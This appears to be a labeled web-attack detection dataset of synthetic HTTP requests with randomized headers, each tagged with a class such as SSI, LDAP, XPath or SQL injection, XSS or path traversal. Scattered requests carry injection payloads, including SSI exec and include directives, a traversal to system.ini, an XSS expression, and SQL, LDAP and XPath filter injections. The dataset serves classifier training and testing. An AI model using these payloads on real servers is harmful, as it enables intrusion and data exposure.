Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 146.107.64.207
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="91"
Date: Mon, 19 Sep 05 08:18:49 UTC
ETag: W/".VbtjpDV.j-vgalLst"
Expect: tNAnh
From: isJ1werq@waei.st
If-Modified-Since: Sun, 19 Oct 08 04:21:11 CET
If-Unmodified-Since: Mon, 09 Mar 09 03:53:08 CET
If-Match: "cA3hYR6DeOuMMRIhctj"
If-None-Match: "dOZhf4E9qU1BmPkNq"
If-Range: *
Max-Forwards: 256
MIME-Version: 3.2
Pragma: meen=Lseipnd
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: /ohwa/rNlr/aIreeons/txae.mspx
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/0.4 (X11; U; Solaris 7.0; et-he; rv:7.5.9) Gecko/72380737
UA-CPU: 68000
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 036x964
Via: FTP/4.9 219.207.6.110
Transfer-Encoding: gzip
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38298
Start - Id: 39880
class: SSI
GET /9e0MuE/oxi3/e.urrl-/u-jYT1fAw9/idccconnectg.png?tsyJAtQdocumentinputp=cii&stdinnTlocationa6LVUK=cEZ&lAe=89865522&ncaop=ettr2&a.E.uftpNx=4 HTTP/1.1
Host: 158.235.43.178
Connection: j5oo
Accept: */*
Accept-Charset: *
Accept-Encoding: <!   #<!--#exec  cmd="id"-->
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 169.162.224.224
Cookie: FQotw0ip=rMpq
Date: Sat, 03 Oct 09 13:33:20 CET
Expect: bea5I0=rtnl0;leaowy=eonM
If-Match: *
If-None-Match: *
If-Range: "0yY_oXfi_Vzk2m_KY1D"
Max-Forwards: 060
Pragma: no-cache
Authorization: Digest nonce
Referer: http://www.ijtlits.biz/siasetj/eCl4sat/9v7urac/nafd/Hadem.gif
TE: trailers,trailers
User-Agent: h7ye_w http://www.3ptqfgi.uk
Via: 7.8 95.142.42.61, 2.0 28.136.31.160:03
Upgrade: uFte/5.9, ehwdyg/9.5, eaet/2.9

null

End - Id: 39880
Start - Id: 38340
class: LdapInjection
GET /swM7A/t9eyuIiem11lte/eehawo/aXI.wC_TVpk@E4DxmYLx/OgMcseeiX1fasvo/ecF-wDyKDH3Y@HcCdRl/xtKgpbAaJ32OSlib/husaeljHatedeA.gif?ttth=euuoz&7s2LC=87levalvatdeletee5rn&utnino2nn=6hh3cnl&lvnlitxdarTtel=ei092olzcoe&eryNtnhbmnesos=+tnjrxl%28l&ia419=495359&zsftwns9nn=ehttpeitanhseA%3Dee&cwh=xSsKMen7&qhomssgNQwnaq=s9&txe=%24t+eRn&hijnh=291%29%28%26%28objectClass%3Dath%29%28%7C%28sn+%3D+++ypmf%29%28cn%3Dcomq++++J*%29%29&eDma0ilnma=iidstwsst6&tsSsnt1woterixk=nmELB&mf1tnyrtodt1=hOsetTrnA%26dHm HTTP/1.0
Host: 127.55.224.159
Connection: close
Accept: application/*;q=0.7, text/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ne-Ett3;q=0.5, ueq5biA-A0h5nft;q=0.4
Cache-Control: no-transform
Client-ip: 116.63.205.12
Cookie: hnSsebam=931322;rssonem8hreTwde= rau?r2hsst nr
Cookie2: $Version="689"
Date: Mon, 11 Sep 06 13:44:56 GMT
ETag: "WbPrN@xJVi3tQ@DS"
Expect: krvt=nsetrd;ejpTaih
From: ha6o@adqussrlf.gov
If-Modified-Since: Sat, 16 Jun 07 13:12:33 UTC
If-Unmodified-Since: Wed, 11 Mar 09 16:47:28 UTC
If-Match: *
If-None-Match: "EW-SDSWc9ivJO@zKJ@"
If-Range: "1M-N9ggkpIJmaNqZ"
Max-Forwards: 226
MIME-Version: 5.1
Pragma: nqefaof=lhiea
Proxy-Authorization: thnpao e7eGhet=ha4hIt
Authorization: NTLM aDhsZW5ld0l1ZW85aWNkaE8ydG5CaGlub2tEb2x6aW81ZHJaZUtjb2Fl
Range: 22-85781,087222-8494,485-7064
Referer: http://www.kessme.net/rgioez2n/r9eR/xxsc/nweAee.txt
TE: gzip;q=0.4,chunked,gzip;q=0.5
Trailer: Pragma
User-Agent: i4ahaenn/5.9.4.9
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6454x625
Via: uiwtsY/9.5 www.hnetr.jpeg, itow/7.8 www.iaxw.js
Transfer-Encoding: gzip
Upgrade: t6h/8.7, dvd/6.5, em9l/7.2
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 0735348068
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38340
Start - Id: 45327
class: PathTransversal
GET /6Hla-CjG_1dEGi4EI8/odqk0.fi@d/lQs3pDVFL8yLcmd/e2qGg/21jwob/rD-_/dBq.exe?s6rtaqe=3820&aeOahpRlvrLb=i%7E%3Di+oQieiws+%2Fwe&xdicca=165511659&ajqTD8BCpOWD=%5BoAi&Mjqv.l3WurcpV=adpPoLkPS&eie9mfe=stdin+tuhmfT+fyd&hh=458711933&tfyaeuqN=%3F&lqar6lmetwne=gtacfrto&emtre9d=oel+sc HTTP/1.0
Host: www.etrIf.it
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: koi8, iso-10646-ucs-2;q=0.7
Accept-Encoding: compress;q=0.7, identity, gzip;q=0.5, deflate
Accept-Language: *;q=0.4
Cache-Control: no-store
Cookie: Rodeyi=..\..\..\..\..\..\WINNT\system.ini
Cookie2: $Version="227"
Date: Fri, 12 Dec 08 21:34:03 CET
Expect: rkbhs9ee
If-Modified-Since: Tue, 03 Jun 08 06:24:52 CET
If-Match: *
If-None-Match: *
If-Range: "mdFeEAx_bheLSRhtv"
Max-Forwards: 882
MIME-Version: 6.1
Pragma: rctt=cetsh
Authorization: Basic Nm92ZWVhaW86aHR0aHM=
Referer: /3nfei/eXsosea/7y2rp.exe
TE: trailers
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 1.8; ut-ie; rv:5.9.2) Gecko/95158589
UA-Disp: 3916,328,8
Via: 1.6 186.133.43.215, 3.5 www.it4o.html, 5.7 www.Enqe.shtml
Transfer-Encoding: deflate
X-Serial-Number: 341978779570501

null

End - Id: 45327
Start - Id: 40768
class: SSI
POST /tzhbF1/beey/dj-42sK8Qax2zN/dEpb5/Ygsystemo2Oi/aAWSvBe4NXB/nwelspx/spta3sc/euYh3-YHjQhYGYxSy1/eNeilse/n5ShmoQ/oe273Cm.nsf? HTTP/1.0
Content-Length: 247
Content-Language: sen4obor,toTr
Content-Encoding: identity
Content-Location: /ebhxlrci/enNnM/ad2Wnmes.rar
Content-MD5: ZWdodGJkQXV0ZXRhc2lvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Feb 04 12:58:49 CET
Last-Modified: Fri, 11 Jun 04 23:37:49 UTC
Host: www.twYoesdtq.org
Connection: close
Accept: video/*, video/mpeg
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: ki5i=nopo
Client-ip: 166.41.33.129
Cookie: holsbfje=rinlmm14tabrcpahm;othrnoiew25af8h=sgaulhoHTtie1a
Cookie2: $Version="581"
Date: Thu, 13 Sep 07 01:52:58 UTC
ETag: "-mDaC72APAXSOUm"
Expect: neiat
From: tt33en@1osNNfn.biz
If-Modified-Since: Thu, 22 Jun 06 11:14:28 GMT
If-Unmodified-Since: Sat, 27 Dec 08 07:53:50 CET
If-Match: "FP2-gxvF8C1Cy4ei"
If-None-Match: "z0laz.ruwPweKf_QTK"
If-Range: *
Max-Forwards: 9010
MIME-Version: 8.0
Pragma: ihogrE='It'
Proxy-Authorization: NTLM SW5hcmx0ZTA2Zmk3ZWt0bGUxZW50aHNpaFJvcm5wc2llZWFlZXVkbmF0cWxh
Authorization: Digest algorithm=MD5-sess
Range: 07-9,0-,-333
Referer: http://www.urte7Eeu.org/itxaX.mdb
TE: deflate;q=0.4,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (Machintosh; U; PPC Mac OS X 1.4; i2-cl; rv:4.1.3) Gecko/53913879
UA-CPU: 68000
UA-Disp: 442,6070,32
UA-OS: Win98
UA-Color: color16
Via: FTP/1.2 240.98.141.252
Transfer-Encoding: s0et
Upgrade: rhe/3.3
Warning: 967 www.drtntae.tiff "nmheag5ib" 
X-Forwarded-For: 31.100.82.188
X-Serial-Number: 3817057
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

5aa4eosiixk=6&ngoe=ns| ecpb=oh&eolNhth0E=<!--    #odbc   statement =   "select    cfdrIi,  eh,     nwuf   from    fa3qhss  order   by  3,  82,   8"     -->&lplPWexeck=j+i a&Grgeneu=lseolxutEg jx6&7dhgrreule=yQnTHLp3iQ0k

End - Id: 40768
Start - Id: 46954
class: XSS
PUT /uuIn/gYRGey_j1ofrq/edfWYOt6Ske/sn3WEMJ/nPMaGSRjPM0/Roms6Lem/t0y0/VE2e.cgi? HTTP/1.1
Content-Length: 255
Content-Language: 4e,w,Ec
Content-Encoding: deflate
Content-Location: /ce87asak/nwatht/ynoati/O6ebzhr5/baatawWo.conf
Content-MD5: eHdkb2Vrb2xvZWFFd3JzMw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 13 Dec 08 08:01:04 CET
Last-Modified: Wed, 16 Nov 05 15:05:50 CET
Host: www.antie.st:49
Connection: th6s
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: max-age=75325
Client-ip: 15.111.69.143
Cookie: iepdywspea9uol=1;ysDot=wgbaH6-Zj1q;Yqshutdownimg4cTy@Cca=eicsuirp9tahilho;sNW=tmeiaiclEsu;riviIpwa=$
Cookie2: $Version="52"
Date: Tue, 20 Jan 04 14:17:27 CET
ETag: "NViduy7oqvlSc-i"
Expect: mexltil=sUytWu
From: trhir@9toer.gov
If-Modified-Since: Sun, 04 Apr 10 14:21:16 GMT
If-Unmodified-Since: Fri, 27 Mar 09 23:43:15 UTC
If-Match: "S4vIIFLQRqZ8yp.V.L1V"
If-None-Match: "ys@0adoX_F41_.aRsRgV"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.4
Pragma: atuneta=r7E
Proxy-Authorization: Basic Z2VveGk6ZXRhbjFvdA==
Authorization: EbVht ttmrelsa=rtwds
Range: -3291
Referer: http://www.pjvrt.it/llq1ds/iHTe6tp/ihnhuSy/iSleoama.bin
TE: trailers,gzip
User-Agent: e_ViynZoZ2 http://www.wmhaeoeh.gov
UA-CPU: StrongARM
UA-Color: color8
Via: 5.3 151.186.75.226, FTP/8.3 www.dyeahsn.gif
Transfer-Encoding: compress
Upgrade: eOo/2.9, nd6H1f/1.0, mciu/8.9
Warning: 267 19.129.120.24 "tleaIa3" 
X-Forwarded-For: 71.176.242.104
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aieemrfsrAw=pWZdifhtefbt&yQU1=i2 4&hhrehefem=dkw&UhIq=oP9XDArUNS&ferr=13&hr=abetweenotm3eiRlate&lbfntaeuort=uhadmin?(uusrsphpla&aeeu87mdt4azue=286536610&fe=dlkP    "   style=left:expression(alert("   lR.ui2tS"))     alt    =    "

End - Id: 46954
Start - Id: 37596
class: LdapInjection
PUT /kI@yFqnhJfLlH0K350/eH0Xt__/rOln-gk3HSsh3D@/tfeCisiuds/d5uyvpQ/lXBc6qmAHfsYshn4eHx/huorntneqnr.jpg? HTTP/1.1
Content-Length: 161
Content-Language: otG
Content-Encoding: deflate
Content-Location: http://jizf3.net/IwslziLe.exe
Content-MD5: N250N3hzNzRlZG50ZTFuZw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: 186.254.13.132
Connection: keep-alive
Accept: text/*;q=0.3, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: lcHhtayR-ee, ib-1hot;q=0.3
Cache-Control: max-age=015
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Fri, 27 Apr 07 15:44:24 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 54
MIME-Version: 4.3
Pragma: bv=ciym7rr
Proxy-Authorization: Digest username="chiw"
Authorization: E0D6 toUen=M8keim
Range: 2-4,-9680
Referer: http://www.nitnhw.net/qiize0el/ePfsdqnt.tar
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/5.2 (Machintosh; U; PPC Mac OS X 5.3; ul-jn; rv:5.5.7) Gecko/30798595
UA-CPU: PowerPC
UA-Disp: 752,1342,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 770x317
Via: HTTP/6.6 5.56.156.91
Transfer-Encoding: deflate
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Gdn=679&4dg@k4_i=ne8-zs8k.ZN&nsdqx2iu=5499597&cwnGOfymwwp-=adug)(&(objectClass= cxsn*)&logR8dkf=e&tRyhIwpdiniae=66336475&GaTm=gredasnslie dob&hh=i7gl

End - Id: 37596
Start - Id: 39563
class: SSI
POST /03CtHPi-/Kz-E1uGimgzzforms/cj/api.jpeg? HTTP/1.0
Content-Length: 210
Content-Language: lr,u
Content-Encoding: gzip
Content-Location: http://www.aeAns.uk/eebimpma/gyes9y/rrihoq3.tiff
Content-MD5: M2FjdGVoZm0wV2lqOXR5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 11 Sep 08 14:58:43 UTC
Last-Modified: Thu, 12 Aug 04 07:19:43 GMT
Host: www.swewnin.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 147.32.196.230
Cookie: me2=%;sgUnbso8oher=enrnpaoa9varnoY;7idhaskuesdntra=6aHlho4sooc
Cookie2: $Version="24"
Date: Sun, 10 Dec 06 01:02:55 GMT
ETag: ".ZpMfbiUz3x2gzQ"
Expect: 100-continue
From: aweeee@nAyt.uk
If-Modified-Since: Mon, 24 Oct 05 18:28:49 CET
If-Unmodified-Since: Sun, 06 Sep 09 14:46:39 UTC
If-Match: *
If-None-Match: *
If-Range: "@hNMJ9Go4AKH886z507"
Max-Forwards: 3243
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: NTLM ZjJzNWlueDhhY29hdHBvZ2VvZWZwcmlyb2ljdDdidm55YXR5eTJpRWV4YWpTZXA=
Authorization: NTLM THR0d2RlZWlscW5yYXRodDF0MGRpd3hhaXN0ZmhzUHN0ZGo1b3dhaG5hc2k=
Range: 55851-,73887-,-7
Referer: http://ainwemo.it/ieEsp/mqmltlf/ijaiJig/k7toe.jpeg
TE: trailers,gzip;q=0.3,deflate;q=0.5
Trailer: Trailer
User-Agent: Mozilla/0.0 (X11; U; Unix 9.9; DO-2h; rv:4.6.8) Gecko/94606601
UA-Disp: 9090,6972,8
UA-OS: Windows 95
UA-Color: color8
Via: ttbAa/3.4 www.feb5.gif:15029
Transfer-Encoding: identity
Upgrade: nqe/4.6, tcf/9.3, s1a3ie/5.1, pcoE/9.0, Ier1/7.4
Warning: 705 73.205.19.33:824 "uGhloLhinanOnahntN" 
X-Serial-Number: 11507528452920010282
----: -----------------
~~~~~: ~~~~~~~~~~

eeel6fnto=t1&phtauY=<!--   #include  virtual="/etc/httpd/httpd.conf" -->&qD=gh&lsqnxade=1129&ojyaeooa6c=3&t4=520150&andtbLs2libJlN=Mnahossphirey&fe=adminOonaBysuw n9<accepto&esse=Yt(8e5e

End - Id: 39563
Start - Id: 38792
class: LdapInjection
GET /ecptahyi/tRB8ufK4FRYuoQ8z@B.gif?estidtE=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&es4uihwesitiulk=4499&tnew74i=oh%2Biekee3pmh%3C HTTP/1.1
Host: www.amwoethHd1.cz
Connection: close
Accept: audio/*;q=0.5, audio/*;q=0.1
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: eEderc-soezo3r;q=0.5, ifttos-Omrlinei;q=0.6, iRsnAp-Ae5;q=0.4, gdd4e-pg, xsd1-kmdn;q=0.7
Cache-Control: m='selae6E'
Client-ip: 239.52.8.232
Cookie: Hedtekvlpogv=18;itatrrnhmtip=lbl;TlCRbgsound= 5 sh[]oeabeg~;execZftpWLP='t0rcptsmn
Cookie2: $Version="919"
Date: Mon, 27 Mar 06 09:58:24 UTC
ETag: "IBtj26H_ux12tRgi"
Expect: 100-continue
From: ia8hCn@scttdt.org
If-Modified-Since: Fri, 18 Mar 05 23:59:33 CET
If-Unmodified-Since: Thu, 24 Nov 05 23:42:41 CET
If-Match: "RkFGcU.C@_W9IEaAfrm"
If-None-Match: "vX_ZMtBciABwoQkP"
If-Range: Mon, 19 Sep 05 20:18:53 UTC
Max-Forwards: 7
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: lnraO geepoll=oRsheku
Authorization: Basic eTR0b2k6b2dyZQ==
Range: 89831-,-364983
Referer: http://iwaevsin.st/eoGpay/slbolvl.bin
TE: gzip;q=0.5,gzip;q=0.3
Trailer: User-Agent
User-Agent: hlCufamoi/2.1.9
UA-CPU: StrongARM
UA-Disp: 754,7315,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8161x590
Via: 7.3 3.128.75.251
Transfer-Encoding: identity
Upgrade: liolTj/2.0, duhrti/7.2, cci/9.1, eaeYog/1.7
Warning: 757 214.136.112.103 "ie6uit3rtiiPirtc" "Mon, 03 Oct 05 02:38:07 UTC"
X-Forwarded-For: 199.212.3.152
X-Serial-Number: 323337935267147
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38792
Start - Id: 42087
class: SqlInjection
GET /JVlYmxDqxvhG/lL-q6Bh9AbN/f7/JG628dTXiZR/oHiEddlanlelnjgean/xTu5qrrletkistod/tak89n9oesiee/Xu.4wqTqautoexecp/nnuojuertucsea.nsf?tri=%27++%2F**%2F++++OR++++%2F**%2F++++%27tiOkdInxO%27+++++%3E++++%27S&u2ohalany7eem=400367&aipKey6nmD=75&i7i6nais55I=41244 HTTP/1.0
Host: www.8oat.gov
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: cvftp-p4ii0o, fi-apennRiu;q=0.8, npo6ydi-2tnletIk;q=0.6, i91t-gNnitaa;q=0.2
Cache-Control: only-if-cached
Client-ip: 44.233.251.244
Cookie: sjt=trvarhrBU'i@ameuf8
Cookie2: $Version="940"
Date: Fri, 13 Mar 09 02:13:34 CET
ETag: "m0e.RyTZWMInQHe"
Expect: bu7dtjr
From: amm24r@w2uiwd.st
If-Modified-Since: Fri, 13 May 05 05:31:51 CET
If-Unmodified-Since: Thu, 12 Nov 09 19:27:23 UTC
If-Match: *
If-None-Match: "CBdoAIx1Iol5FHJG"
If-Range: "RwDNWimwizwzv2YAtk"
Max-Forwards: 0655
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: -951
Referer: http://aeasro.de/aaax/a6Aqtd2/aache/edu0nat.jsp
TE: trailers
Trailer: If-Match
User-Agent: tWWaP2 http://www.etraedi.fr
UA-CPU: x86
UA-Disp: 7402,9004,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 4728x9077
Via: 7.4 www.trrsilt.gif, 9.3 www.cIefl.jpeg:40
Transfer-Encoding: auhi; indgdeow=tRtudi
Upgrade: a3r/9.3, rhiho/2.1, tse/5.1
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42087
Start - Id: 35790
class: XPathInjection
GET /oU2OwxlDpZxQ9-C_Ny/tkm5drpnnfe/t82tJZxNqOR6hbEXb/xtr6t1ci/arfn1SW.png?Yiframe@yRd2OSVH=uchilde&s9itedN=87902+++or++1%3C++++deeJo%2Furrhcs%2Fhrrs8%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D28%5D+++or+6677%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&kreagwghen6iae=0425034&bW96b1y@Cscript=aeOx HTTP/1.0
Host: www.0itfHrRoe.net:80
Connection: keep-alive
Accept: application/postscript, audio/*
Accept-Charset: koi8, iso-8859-6, iso-8859-9, iso-8859-7
Accept-Encoding: 
Accept-Language: 2hwsn0-ndoe, fjattnvd-ls
Cache-Control: only-if-cached
Cookie: REbo=h=;ood=drop6$eq;1inputu3j1n=openn
Cookie2: $Version="1"
Date: Fri, 09 Jan 09 15:46:19 UTC
ETag: "vy@i_rJBzSWPindrb"
Expect: 100-continue
If-Modified-Since: Sat, 05 Dec 09 01:49:57 GMT
If-Unmodified-Since: Sat, 04 Apr 09 13:48:47 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jun 06 17:12:12 CET
Max-Forwards: 522
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: luLc Okt8e=3llo
Authorization: Basic aWtvY2V5bmE6Z3JpcjZveg==
Referer: http://www.tw3m4o.cz/9ist2q.gif
TE: trailers,deflate;q=0.9,chunked;q=0.7
Trailer: Expect
User-Agent: Mozilla/4.5 (Windows; U; Win98 7.6; ad-ne; rv:1.9.3) Gecko/26867148
Via: FTP/8.7 www.aiOieu.tiff:61, HTTP/5.7 www.tRiNfce.shtml, 0.3 49.102.105.83:30088
Upgrade: lse7/5.0, eaI/8.5
Warning: 396 72.31.252.105:54837 "8rfz" "Tue, 15 Dec 09 08:04:48 UTC"
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35790
Start - Id: 37233
class: LdapInjection
GET /uumdl/sVu4rSSCdVUIK.mspx?uaqtm4bs=iybnr%29%28++%7C+++%28canOe%3D*%29 HTTP/1.1
Host: 138.39.176.171
Connection: tsureecm
Accept: video/*
Accept-Charset: iso-8859-6, cp-936, utf-8;q=0.7, shift_jis;q=0.2, iso-8859-5
Accept-Encoding: compress;q=0.0, compress
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 164.10.58.80
Cookie: frecxIml=$g 6;nyo=uls1n;ehoa ai ;fO=saTto>~\;tqgt8nAsdgrn=87;NWd=ehj/&;8IQw=umasT2tcr )h
Cookie2: $Version="79"
Date: Mon, 03 Dec 07 11:00:32 CET
ETag: W/"VVbnVS5cZA_abHU@RqP@"
Expect: xg5edee=apam;5hda
From: 87ho@Inuowxs.net
If-Modified-Since: Sat, 11 Oct 08 08:53:22 CET
If-Unmodified-Since: Wed, 03 Nov 04 15:46:55 CET
If-Match: "co8n4J2dQV3nvJhikI"
If-None-Match: *
If-Range: Thu, 01 Jul 04 21:53:41 CET
Max-Forwards: 757
MIME-Version: 2.4
Pragma: st=cslvuo
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: vghc tzcn=txlrsuw
Range: -035
Referer: /wSm1rr/osrvdt.pdf
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Windows; U; WinNT 4.4; ma-Ho; rv:9.4.4) Gecko/93515158
UA-CPU: PowerPC
UA-Disp: 836,441,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0327x020
Via: 3.6 www.tsoxn.jpeg
Transfer-Encoding: deflate
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 444 71.101.94.149:869 "e5eslcsyoIxfqbnaAe" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37233
Start - Id: 48354
class: XPathInjection
GET /rJ2jtwspkOY0rThF.@m/dUHghom7pj/eMxmVu./fNXslfdT/r@6HzDXtmFRHSwRqmXi/tGGRIzB0l7AQhyDfY/gdg/ussn3pahq/eNvRNg95V/ncinejMYw@D/oudiTyxvO/6-Fn@tqn9iI.pl?C3ittAbc5ifste=s0E&ntTdonecEnem8ff=h%25a0di5ia8%3Dur%7C%29fffde+&6tOhhny=k%2Bgnt0pstetform7&Asqi=nrHEdvtsbaggpe&Gyii=se%3B&loeheeusvw=82 HTTP/1.0
Host: 196.138.58.105
Connection: eroidvuc
Accept: */*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.3, identity;q=0.6, deflate, identity
Accept-Language: qoj9h-rhh, too-kmoaHYd;q=0.0, rsscood-v0
Cache-Control: wcmy1=ri
Client-ip: 107.146.131.163
Cookie: ameUzdw=4858391;ohnovh1lii=a5JSrr2bsai;lacsvnats9a6=50332;-dLZIimgJErL=haa;lh=854625035
Cookie2: $Version="4"
Date: Mon, 21 Feb 05 13:13:10 UTC
ETag: W/"cSZIqXU9wKzZsf@"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Mon, 25 Dec 06 17:20:16 UTC
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "2MDIVp-vpmp3HPHnyD.p"
If-None-Match: "QEEZkRyz_Is0dopIOiI6"
If-Range: Mon, 06 Feb 06 18:26:46 UTC
Max-Forwards: 22
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: idn2 t3g6oh4=t46e
Range: -579124,02412-
Referer: /rnoats.jsp
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: iNrn'     or     (i <     count(skr/child::text())  and     j <  count(2evrro/child::comment())  and  k  <     count(0t/child::*)    )  or   'i4uit' = '  4Oxit0ok'     or
UA-Color: color32
UA-Pixels: 784x5970
Via: HTTP/9.6 www.bpfa.gif, 0.2 www.5irec.jpg, 9.1 www.NpeEl.html
Transfer-Encoding: deflate
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 17597605220
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48354
Start - Id: 38457
class: LdapInjection
GET /49/ohtsFUM9LGBa0y/tZcKWZ/rreIEiioatRomcp4xoi/oORwdsJy8/sHa/ptd5AX@IUJN9NGJ.sh?P8vhAS=m1e9oi9lde1j&qtnbl=r1y%27+i5+a&hcatkohuugx=4829%29%28%26%28objectClass%3D7en%29%28%7C%28sn++++%3D+eSj%29%28cn%3DeO+J*%29%29 HTTP/1.0
Host: www.scp8nc.org
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 131.162.142.41
Cookie: ucHaiv=7i os;rsg=]em f;iphEo=6421;gyCsamLbstOx=eel
Cookie2: $Version="35"
Date: Fri, 06 Oct 06 05:10:03 CET
ETag: "BEY1rkX2szAN0S7hA"
Expect: 100-continue
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sun, 08 Aug 04 20:10:14 UTC
If-Unmodified-Since: Fri, 23 Jan 04 01:43:42 CET
If-Match: "umgmdH3Pk..eY0_P0-hh"
If-None-Match: "psD4uq0AaYQ5aPSbL8nl"
If-Range: "viw1wKSEZ6Drswu3r"
Max-Forwards: 921
MIME-Version: 3.3
Pragma: o3autEen=elpo
Proxy-Authorization: tkpee UiM63=shnNe4q
Authorization: NTLM bWU4OGNvNnNOOXJ1d3FOOW9oYXFmcjNvcm1hb3FlbGMzYXRhZWRydGV0M0E=
Range: 33-09668,018857-,31-3
Referer: http://lvyeS.com/z7ol/s6rc.msf
TE: trailers
Trailer: If-Match
User-Agent: eegie/3.5
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 2.4 www.oaneeeyt.gif:88210, refeaA/2.6 www.iOgN.html
Transfer-Encoding: deflate
